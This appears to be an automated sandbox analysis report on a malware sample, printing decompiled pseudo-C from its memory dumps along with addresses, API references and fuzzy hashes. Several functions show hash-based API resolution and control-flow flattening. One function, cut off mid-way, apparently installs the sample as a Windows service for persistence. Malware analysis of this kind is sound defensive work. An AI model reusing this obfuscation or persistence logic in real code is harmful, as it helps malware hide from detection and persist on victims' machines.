													_v128 = _v128 ^ 0xe0738efa;
													_v128 = _v128 >> 6;
													_v128 = _v128 + 0xffffe737;
													_v128 = _v128 ^ 0x0381bbc4;
													_t222 = E02235D50();
													__eflags = _v128 - _t222;
													if(_v128 <= _t222) {
														_t304 = 0;
														__eflags = 0;
													} else {
														_t227 = E02234190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t228 =  *_t227();
														_t229 = E02235D50();
														_t230 = E02235D20();
														_t327 = _t230 - _t229;
														_t347 = _t228 % (_t230 - _t229);
														_t304 = _t347;
													}
													_t369 =  *0x223ddbc; // 0x0
													__eflags = _t369;
													if(_t369 == 0) {
														_t225 = E02233F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t225;
														_t369 = E02233E80(_t304, _t225, 0xcfd93ac1, _t391);
														 *0x223ddbc = _t369;
													}
													_t223 = E02235D50();
													_t224 =  *_t369();
													_t300 = _t347;
													_t371 = _t224 + _t304 + _t223;
													_t191 = 0x1c32e2d2;
													asm("adc ebx, 0x0");
												} else {
													_v124 = 0xb2e0;
													_t391 = 0x8e1a01c;
													_t234 = _v124;
													_t327 = (_t234 << 4) - _t234 << 2;
													_v124 = (_t234 << 4) - _t234 << 2;
													_v124 = _v124 ^ 0x00245720;
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													__eflags = _v124 - _v128;
													if(_v124 <= _v128) {
														_t385 = 0;
														__eflags = 0;
													} else {
														_t241 = E02234190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t242 =  *_t241();
														_t243 = E02235DC0();
														_t244 = E02235D90();
														_t327 = _t244 - _t243;
														_t347 = _t242 % (_t244 - _t243);
														_t385 = _t347;
													}
													_t236 =  *0x223ddbc; // 0x0
													__eflags = _t236;
													if(_t236 == 0) {
														_t240 = E02233F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t240;
														_t236 = E02233E80(_t300, _t240, 0xcfd93ac1, _t391);
														 *0x223ddbc = _t236;
													}
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													_t237 =  *_t236();
													_t300 = _t347;
													_t371 = _t237 + _v128 + _t385;
													_t191 = 0x380a1784;
													asm("adc ebx, 0x0");
												}
												while(1) {
													L1:
													_t375 = 0x2564be4f;
													goto L2;
												}
											}
										} else {
											if(__eflags == 0) {
												return E02238BA0(_t327, _t391);
											} else {
												__eflags = _t191 - 0x27047861;
												if(_t191 == 0x27047861) {
													_t209 = E02237160(_t300);
													__eflags = _t209;
													if(_t209 == 0) {
														goto L142;
													} else {
														_t191 = 0x226f6c18;
														continue;
													}
												} else {
													__eflags = _t191 - 0x27dc0a4c;
													if(_t191 != 0x27dc0a4c) {
														break;
													} else {
														_v32 = E02235EA0();
														_t191 = 0xd28318f;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t249 = E02239320(_t391);
											asm("sbb eax, eax");
											_t191 = ( ~_t249 & 0x1c98683e) + 0xe0d6cd8;
											continue;
										} else {
											__eflags = _t191 - 0x226f6c18;
											if(__eflags > 0) {
												__eflags = _t191 - 0x2537e9de;
												if(_t191 != 0x2537e9de) {
													break;
												} else {
													__eflags = _t371 | _t300;
													if((_t371 | _t300) == 0) {
														L81:
														_t191 = _t391;
														break;
													} else {
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t254 = E02235CD0();
														__eflags = _t254 - _v128;
														if(_t254 <= _v128) {
															_t347 = 0;
															__eflags = 0;
														} else {
															_t258 = E02234190(_t300, 0xbb398380, 0xae3c1a47, _t391, 0xb3);
															_t398 = _t398 + 4;
															_t259 =  *_t258();
															_t260 = E02235CD0();
															_t347 = _t259 % (_t260 - E02235D00());
															_t375 = 0x2564be4f;
														}
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t327 = _v128 + _t347;
														_t255 = E02239EA0(_t300, _v128 + _t347);
														__eflags = _t255;
														if(_t255 == 0) {
															_t347 = 0xcfd93ac1;
															_t327 = 0xbb398380;
															_t256 = E02234190(_t300, 0xbb398380, 0xcfd93ac1, _t391, 0xcf);
															_t398 = _t398 + 4;
															_t257 =  *_t256();
															__eflags = 0xcfd93ac1 - _t300;
															if(__eflags < 0) {
																goto L27;
															} else {
																if(__eflags > 0) {
																	goto L81;
																} else {
																	__eflags = _t257 - _t371;
																	if(_t257 < _t371) {
																		goto L27;
																	} else {
																		goto L81;
																	}
																}
															}
														} else {
															goto L77;
														}
													}
												}
											} else {
												if(__eflags == 0) {
													E02236FB0(_t300);
													_t191 = 0xf0c159c;
													continue;
												} else {
													__eflags = _t191 - 0x216a974b;
													if(_t191 == 0x216a974b) {
														_v36 = E022347A0(_t300, _t391);
														_t191 = 0x27dc0a4c;
														continue;
													} else {
														__eflags = _t191 - 0x21c0adc4;
														if(_t191 != 0x21c0adc4) {
															break;
														} else {
															E022387D0();
															_t191 = 0x14860a92;
															continue;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L143;
						}
						__eflags = _t191 - 0x33f417f9;
					} while (_t191 != 0x33f417f9);
					return _t191;
					goto L143;
				}
			}

0x02236536
0x0223653d
0x02236541
0x02236547
0x02236551
0x02236551
0x02236551
0x02236560
0x02236560
0x02236560
0x02236560
0x02236565
0x00000000
0x00000000
0x0223656b
0x0223656b
0x02236ef5
0x02236571
0x02236571
0x02236576
0x0223674d
0x02236752
0x02236809
0x0223680e
0x02236854
0x02236859
0x00000000
0x0223685f
0x02236867
0x0223686e
0x00000000
0x0223686e
0x02236810
0x02236810
0x02236846
0x0223684a
0x00000000
0x02236812
0x02236812
0x02236817
0x02236832
0x02236837
0x00000000
0x02236819
0x02236819
0x0223681e
0x00000000
0x02236824
0x02236824
0x00000000
0x02236824
0x0223681e
0x02236817
0x02236810
0x02236758
0x02236758
0x022367bb
0x022367c0
0x022367c2
0x02236987
0x02236987
0x022367c8
0x022367cc
0x022367d0
0x022367d5
0x022367d7
0x022367de
0x022367e3
0x022367ea
0x022367ef
0x022367ef
0x022367f4
0x022367fb
0x022367ff
0x022367ff
0x00000000
0x0223675a
0x0223675a
0x0223675f
0x0223679d
0x022367a2
0x00000000
0x022367a8
0x022367a8
0x022367ad
0x00000000
0x022367ad
0x02236761
0x02236761
0x0223678e
0x02236793
0x00000000
0x02236763
0x02236763
0x02236768
0x02236784
0x00000000
0x0223676a
0x0223676a
0x0223676f
0x00000000
0x02236775
0x02236775
0x0223677a
0x00000000
0x0223677a
0x0223676f
0x02236768
0x02236761
0x0223675f
0x02236758
0x0223657c
0x0223657c
0x02236735
0x0223673c
0x02236743
0x00000000
0x02236582
0x02236582
0x02236587
0x02236672
0x02236677
0x02236713
0x02236718
0x00000000
0x0223671e
0x0223671e
0x02236723
0x02236725
0x02236f08
0x02236f0f
0x0223672b
0x0223672b
0x00000000
0x0223672b
0x02236725
0x0223667d
0x0223667d
0x022366ef
0x022366ff
0x0223670b
0x00000000
0x0223667f
0x0223667f
0x02236684
0x022366c6
0x022366cb
0x022366cd
0x022366cf
0x022366d2
0x022366d7
0x022366dd
0x022366e1
0x022366e5
0x022366e5
0x00000000
0x02236686
0x02236686
0x0223668b
0x00000000
0x02236691
0x02236691
0x0223669b
0x022366a5
0x022366aa
0x022366af
0x022366b2
0x022366b6
0x022366b8
0x022366b8
0x00000000
0x022366b8
0x0223668b
0x02236684
0x0223667d
0x0223658d
0x0223658d
0x0223663e
0x02236651
0x02236654
0x02236658
0x02236664
0x02236668
0x00000000
0x02236593
0x02236593
0x02236598
0x022365dd
0x022365e2
0x0223662f
0x02236634
0x00000000
0x022365e4
0x022365e4
0x022365e9
0x00000000
0x022365ef
0x022365ef
0x022365f4
0x022365fa
0x022365fc
0x02236612
0x02236623
0x022365fe
0x022365fe
0x0223660a
0x0223660a
0x00000000
0x022365fc
0x022365e9
0x0223659a
0x0223659a
0x022365d1
0x022365d6
0x02236560
0x02236560
0x02236560
0x02236565
0x00000000
0x00000000
0x00000000
0x02236565
0x00000000
0x0223659c
0x022365a1
0x022365c1
0x022365c6
0x02236560
0x02236560
0x02236560
0x02236565
0x00000000
0x00000000
0x00000000
0x02236565
0x022365a3
0x022365a8
0x00000000
0x022365ae
0x022365b5
0x022365ba
0x02236560
0x02236560
0x02236560
0x02236565
0x00000000
0x00000000
0x00000000
0x02236565
0x02236560
0x022365a8
0x022365a1
0x0223659a
0x02236598
0x0223658d
0x02236587
0x0223657c
0x02236576
0x00000000
0x02236878
0x02236878
0x0223687d
0x02236c63
0x02236c68
0x02236cf8
0x02236cfd
0x02236d79
0x02236d7e
0x00000000
0x02236d84
0x02236d84
0x02236d8c
0x02236d91
0x02236d96
0x02236d9e
0x02236da6
0x02236dae
0x02236db6
0x02236dbe
0x02236dc6
0x02236dce
0x02236dd6
0x02236de6
0x02236deb
0x02236df3
0x02236df7
0x02236dfb
0x02236e57
0x02236dfd
0x02236dfd
0x02236e03
0x02236e05
0x02236e1d
0x02236e1f
0x02236e1f
0x02236e25
0x02236e2d
0x02236e32
0x02236e3a
0x02236e42
0x02236e51
0x02236e53
0x02236e59
0x02236e5f
0x02236e61
0x02236e68
0x02236e6d
0x02236e79
0x02236e7b
0x02236e7b
0x02236e81
0x02236e89
0x02236e91
0x02236e99
0x02236ea1
0x02236ea9
0x02236eb1
0x02236ec1
0x02236ec6
0x02236ece
0x02236ed2
0x02236edc
0x02236ee1
0x00000000
0x02236ee1
0x02236cff
0x02236cff
0x02236d6a
0x02236d6f
0x00000000
0x02236d01
0x02236d01
0x02236d06
0x02236d54
0x02236d59
0x00000000
0x02236d08
0x02236d08
0x02236d0d
0x00000000
0x02236d13
0x02236d13
0x02236d1b
0x02236d20
0x02236d22
0x00000000
0x02236d28
0x02236d2a
0x02236d2f
0x02236d33
0x02236d38
0x02236d3a
0x02236d40
0x02236d43
0x02236d48
0x02236d48
0x02236d3a
0x00000000
0x02236d22
0x02236d0d
0x02236d06
0x02236cff
0x02236c6e
0x02236c6e
0x02236f03
0x00000000
0x02236c74
0x02236c74
0x02236c79
0x02236cde
0x02236ce3
0x00000000
0x02236ce9
0x02236ce9
0x02236cee
0x00000000
0x02236cee
0x02236c7b
0x02236c7b
0x02236cc7
0x02236ccc
0x02236cce
0x00000000
0x02236cd4
0x02236cd4
0x00000000
0x02236cd4
0x02236c7d
0x02236c7d
0x02236c82
0x02236c99
0x02236cad
0x02236cb1
0x02236cb8
0x02236cbd
0x02236551
0x02236551
0x02236551
0x00000000
0x02236556
0x02236c84
0x02236c84
0x02236c89
0x00000000
0x02236c8f
0x02236c8f
0x00000000
0x02236c8f
0x02236c89
0x02236c82
0x02236c7b
0x02236c79
0x02236c6e
0x02236883
0x02236883
0x02236c43
0x02236c47
0x02236c4b
0x02236c52
0x02236c59
0x00000000
0x02236889
0x02236889
0x0223688e
0x022369e9
0x022369ee
0x02236a2e
0x02236a33
0x00000000
0x02236a35
0x02236a35
0x02236a3d
0x02236a46
0x02236a4a
0x02236a57
0x02236a5f
0x02236a64
0x02236a6c
0x02236a79
0x02236a7e
0x02236a81
0x02236a83
0x02236b7a
0x02236b80
0x02236b87
0x02236b8a
0x02236b8f
0x02236b8f
0x02236b92
0x02236b9a
0x02236b9f
0x02236ba7
0x02236bac
0x02236bb4
0x02236bbc
0x02236bc1
0x02236bc5
0x02236bfc
0x02236bfc
0x02236bc7
0x02236bd6
0x02236bdb
0x02236bde
0x02236be2
0x02236be9
0x02236bf2
0x02236bf6
0x02236bf8
0x02236bf8
0x02236bfe
0x02236c04
0x02236c06
0x02236c0d
0x02236c12
0x02236c17
0x02236c1e
0x02236c20
0x02236c20
0x02236c26
0x02236c2e
0x02236c32
0x02236c34
0x02236c36
0x02236c3b
0x02236a89
0x02236a89
0x02236a91
0x02236a96
0x02236aa1
0x02236aa4
0x02236aa8
0x02236ab0
0x02236ab8
0x02236ac0
0x02236ac8
0x02236acd
0x02236ad9
0x02236add
0x02236b14
0x02236b14
0x02236adf
0x02236aee
0x02236af3
0x02236af6
0x02236afa
0x02236b01
0x02236b0a
0x02236b0e
0x02236b10
0x02236b10
0x02236b16
0x02236b1b
0x02236b1d
0x02236b24
0x02236b29
0x02236b2e
0x02236b30
0x02236b35
0x02236b35
0x02236b3a
0x02236b42
0x02236b4a
0x02236b52
0x02236b57
0x02236b5f
0x02236b63
0x02236b6b
0x02236b6d
0x02236b72
0x02236b72
0x02236551
0x02236551
0x02236551
0x00000000
0x02236551
0x02236551
0x022369f0
0x022369f0
0x02236f02
0x022369f6
0x022369f6
0x022369fb
0x02236a17
0x02236a1c
0x02236a1e
0x00000000
0x02236a24
0x02236a24
0x00000000
0x02236a24
0x022369fd
0x022369fd
0x02236a02
0x00000000
0x02236a04
0x02236a09
0x02236a0d
0x00000000
0x02236a0d
0x02236a02
0x022369fb
0x022369f0
0x02236894
0x02236894
0x022369d1
0x022369d8
0x022369df
0x00000000
0x0223689a
0x0223689a
0x0223689f
0x022368e6
0x022368eb
0x00000000
0x022368f1
0x022368f3
0x022368f5
0x022369bc
0x022369bc
0x00000000
0x022368fb
0x022368fb
0x02236903
0x02236908
0x02236910
0x02236918
0x0223691d
0x02236921
0x02236959
0x02236959
0x02236923
0x02236932
0x02236937
0x0223693a
0x0223693e
0x02236950
0x02236952
0x02236952
0x0223695b
0x02236963
0x02236968
0x02236970
0x0223697c
0x0223697e
0x02236983
0x02236985
0x02236996
0x0223699b
0x022369a0
0x022369a5
0x022369a8
0x022369aa
0x022369ac
0x00000000
0x022369b2
0x022369b2
0x00000000
0x022369b4
0x022369b4
0x022369b6
0x00000000
0x00000000
0x00000000
0x00000000
0x022369b6
0x022369b2
0x00000000
0x00000000
0x00000000
0x02236985
0x022368f5
0x022368a1
0x022368a1
0x022368d7
0x022368dc
0x00000000
0x022368a3
0x022368a3
0x022368a8
0x022368c9
0x022368cd
0x00000000
0x022368aa
0x022368aa
0x022368af
0x00000000
0x022368b5
0x022368b5
0x022368ba
0x00000000
0x022368ba
0x022368af
0x022368a8
0x022368a1
0x0223689f
0x02236894
0x0223688e
0x02236883
0x00000000
0x0223687d
0x022369be
0x022369be
0x022369d0
0x00000000
0x022369d0

Strings

ke@5, xrefs: 02236D6F
W$, xrefs: 02236AA8
l!`u, xrefs: 02236DF3
ke@5, xrefs: 02236D01

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 68b839dee1391adc3a5651a3e9bf83e38ca0efdee584fddf5ff4e1906d07817f
Instruction ID: f6226fc0b5ee2ce1eb51733b5606b426540b3c95d9df7e917a383f906cb72a6e
Opcode Fuzzy Hash: 68b839dee1391adc3a5651a3e9bf83e38ca0efdee584fddf5ff4e1906d07817f
Instruction Fuzzy Hash: EC22E4F26343029BC72AEEE8954413E76EEAB80744F54082EF585D7258EB70CD49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00406204, Relevance: 4.6, APIs: 3, Instructions: 75
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00406204(intOrPtr* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				short _v54;
				struct _TIME_ZONE_INFORMATION _v208;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				GetLocalTime( &_v20);
				GetSystemTime( &_v36);
				_t43 = _v36.wMinute -  *0x439ce2; // 0x0
				if(_t43 != 0) {
					L6:
					_t23 = GetTimeZoneInformation( &_v208);
					if(_t23 == 0xffffffff) {
						_t24 = _t23 | 0xffffffff;
					} else {
						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
							_t24 = 0;
						} else {
							_t24 = 1;
						}
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t37 = _t37;
					 *0x439cd0 = _t24;
					_t39 = _t39;
					L14:
					_t31 = E00408F71(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
					_t36 = _a4;
					if(_t36 == 0) {
						return _t31;
					}
					 *_t36 = _t31;
					return _t31;
				}
				_t44 = _v36.wHour -  *0x439ce0; // 0x0
				if(_t44 != 0) {
					goto L6;
				}
				_t45 = _v36.wDay -  *0x439cde; // 0x0
				if(_t45 != 0) {
					goto L6;
				}
				_t46 = _v36.wMonth -  *0x439cda; // 0x0
				if(_t46 != 0) {
					goto L6;
				}
				_t47 = _v36.wYear -  *0x439cd8; // 0x0
				if(_t47 != 0) {
					goto L6;
				}
				_t24 =  *0x439cd0; // 0x0
				goto L14;
			}

0x00406211
0x0040621b
0x00406225
0x0040622c
0x00406269
0x00406270
0x00406279
0x00406296
0x0040627b
0x0040627e
0x00406292
0x0040628d
0x0040628f
0x0040628f
0x0040627e
0x004062a3
0x004062a4
0x004062a5
0x004062a6
0x004062a7
0x004062a8
0x004062ad
0x004062ae
0x004062cd
0x004062d2
0x004062da
0x004062df
0x004062df
0x004062dc
0x00000000
0x004062dc
0x00406232
0x00406239
0x00000000
0x00000000
0x0040623f
0x00406246
0x00000000
0x00000000
0x0040624c
0x00406253
0x00000000
0x00000000
0x00406259
0x00406260
0x00000000
0x00000000
0x00406262
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00406211
GetSystemTime.KERNEL32(?), ref: 0040621B
GetTimeZoneInformation.KERNEL32(?), ref: 00406270

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Time$InformationLocalSystemZone
String ID:
API String ID: 2475273158-0
Opcode ID: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
Instruction ID: 3f1c4332e89f5b2d1d6816171f69ac3eb852245dda195b9ef9698e6a055d0bd8
Opcode Fuzzy Hash: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
Instruction Fuzzy Hash: 1B214F2990001AE5CB20AFD9E8045FE73B8BB05710F45116AF812A61D0E7785DD2D77C

Uniqueness

Uniqueness Score: -1.00%

Function 00404F00, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404F00(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E00404EAA( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x43960c(_a4, _a8);
			}

0x00404f0d
0x00404f21
0x00404f35
0x00404f4d
0x00404f37
0x00404f3e
0x00404f3e
0x00404f55
0x00000000
0x00404f57
0x00000000
0x00404f5e
0x00404f55
0x00000000
0x00404f23
0x00000000

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
Instruction ID: b4a2923728d38d9147ff113c7bedcff831c7b24fed2f7eef246683424e6392e6
Opcode Fuzzy Hash: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
Instruction Fuzzy Hash: 1DF031B150410ABACF01AF71DC449AE7BA8AF84344B448032FA15E51A1DB38DA12DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004198B0, Relevance: 4.5, APIs: 3, Instructions: 36
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004198B0(void* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t7;
				void* _t14;
				void* _t16;
				struct HWND__** _t20;

				_t21 = __ebp;
				_t7 = _a4;
				_t20 = _t7 + 0x1c;
				_t16 = E00413740(__ebp, GetParent( *(_t7 + 0x1c)));
				if(E00416753(_t16, 0x42cc08) == 0) {
					L4:
					return 0;
				}
				if(_a8 != 0) {
					L5:
					return _t16;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t14 = E00413740(_t21, GetParent( *_t20));
					if(_t14 == 0) {
						goto L5;
					}
					_t6 = _t14 + 0x1c; // 0x1c
					_t20 = _t6;
					if(IsIconic( *(_t14 + 0x1c)) == 0) {
						continue;
					}
					goto L4;
				}
				goto L5;
			}

0x004198b0
0x004198b0
0x004198c0
0x004198cb
0x004198db
0x00419902
0x00000000
0x00419902
0x004198e2
0x00419906
0x00000000
0x00000000
0x00000000
0x00000000
0x004198e4
0x004198e4
0x004198e9
0x004198f0
0x00000000
0x00000000
0x004198f5
0x004198f5
0x00419900
0x00000000
0x00000000
0x00000000
0x00419900
0x00000000

APIs

GetParent.USER32(?), ref: 004198C3
GetParent.USER32(?), ref: 004198E6
IsIconic.USER32 ref: 004198F8

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Parent$Iconic
String ID:
API String ID: 344791563-0
Opcode ID: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
Instruction ID: 95d136e54c1882d44521d8e3266ce7aea084792c8d1a411097e8097360147bcb
Opcode Fuzzy Hash: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
Instruction Fuzzy Hash: 7AF0B4B1320205BEDB206F22DC54E9B775CEF80795B15843AF511D7261D738DC86C764

Uniqueness

Uniqueness Score: -1.00%

Function 00412ABD, Relevance: 4.5, APIs: 3, Instructions: 29
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412ABD(intOrPtr _a4) {
				intOrPtr _t6;
				void* _t13;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					_t13 = 1;
					return _t13;
				}
			}

0x00412abd
0x00412ac9
0x00000000
0x00412afd
0x00412aff
0x00000000
0x00412aff

APIs

GetKeyState.USER32(00000010), ref: 00412AE4
GetKeyState.USER32(00000011), ref: 00412AED
GetKeyState.USER32(00000012), ref: 00412AF6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: a8f8163b5a00785f8c589019fe7ab30a7541db7938f29a10131867e1fa7de398
Instruction ID: f060bf0bb44e7932bfef4c0a17985a51a6ccefe8c5352f6dc740857419941b1b
Opcode Fuzzy Hash: a8f8163b5a00785f8c589019fe7ab30a7541db7938f29a10131867e1fa7de398
Instruction Fuzzy Hash: EDE092356082599DEE12DE408B02FD567B0AF20790F418467EA84EB091C6E8BCE7D77D

Uniqueness

Uniqueness Score: -1.00%

Function 022387D0, Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E022387D0() {
				char _v520;
				void* _v524;
				intOrPtr _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t16;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t32;
				void* _t35;
				intOrPtr _t40;
				intOrPtr* _t53;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				short* _t62;
				short** _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t64 =  &_v524;
				_t58 = 0;
				_t11 = 0x388705c7;
				_v524 = 0;
				_t63 = _v524;
				_t35 = _v524;
				_t60 = _v524;
				while(1) {
					_t66 = _t11 - 0x2793b377;
					if(_t66 > 0) {
						goto L21;
					}
					L2:
					if(_t66 == 0) {
						E02235070(_t35, _t63);
						_t11 = 0x93584cb;
						continue;
					} else {
						_t67 = _t11 - 0x124353fe;
						if(_t67 > 0) {
							if(_t11 == 0x2169f629) {
								_t21 =  *0x223ddb8;
								if(_t21 == 0) {
									_t21 = E02233E80(_t35, E02233F20(0x667fdee), 0x505cb3fe, _t63);
									 *0x223ddb8 = _t21;
								}
								 *_t21(_t35);
								L36:
								return _t58;
							} else {
								goto L18;
							}
						} else {
							if(_t67 == 0) {
								_t24 = E022334C0(0x223d8f0);
								_t53 =  *0x223dc60;
								_t59 = _t24;
								if(_t53 == 0) {
									_t53 = E02233E80(_t35, E02233F20(0xe66945e6), 0xcca28b0d, _t63);
									 *0x223dc60 = _t53;
								}
								_t40 =  *0x223e2ec;
								 *_t53( &_v520, 0x104, _t59, _t40 + 0x5c, _t40 + 0x278);
								_t64 = _t64 + 0x14;
								E02233460(_t59);
								_t58 = _v524;
								_t11 = 0x3acbd78;
								continue;
							} else {
								if(_t11 == 0x3acbd78) {
									_t62 =  *0x223e2ec + 0x278;
									while( *_t62 != 0x5c) {
										_t62 = _t62 + 2;
									}
									_t60 = _t62 + 2;
									_t11 = 0x2d3078b2;
									continue;
								} else {
									if(_t11 == 0x93584cb) {
										_t32 =  *0x223ddb8;
										if(_t32 == 0) {
											_t32 = E02233E80(_t35, E02233F20(0x667fdee), 0x505cb3fe, _t63);
											 *0x223ddb8 = _t32;
										}
										 *_t32(_t63);
										L10:
										_t11 = 0x2169f629;
										continue;
										do {
											while(1) {
												_t66 = _t11 - 0x2793b377;
												if(_t66 > 0) {
													goto L21;
												}
												goto L2;
											}
											goto L21;
										} while (_t11 != 0x33cd76b6);
										return _t58;
									}
								}
							}
						}
					}
					L37:
					L21:
					if(_t11 == 0x2d3078b2) {
						_t12 =  *0x223e0f4;
						if(_t12 == 0) {
							_t12 = E02233E80(_t35, E02233F20(0x667fdee), 0x7f692adf, _t63);
							 *0x223e0f4 = _t12;
						}
						_t35 =  *_t12(0, 0, 0xf003f);
						if(_t35 == 0) {
							goto L36;
						} else {
							_t11 = 0x34ee6736;
							continue;
						}
					} else {
						if(_t11 == 0x34ee6736) {
							_t16 =  *0x223db50;
							if(_t16 == 0) {
								_t16 = E02233E80(_t35, E02233F20(0x667fdee), 0xc2730d45, _t63);
								 *0x223db50 = _t16;
							}
							_t63 =  *_t16(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t63 == 0) {
								goto L10;
							} else {
								_t58 = 1;
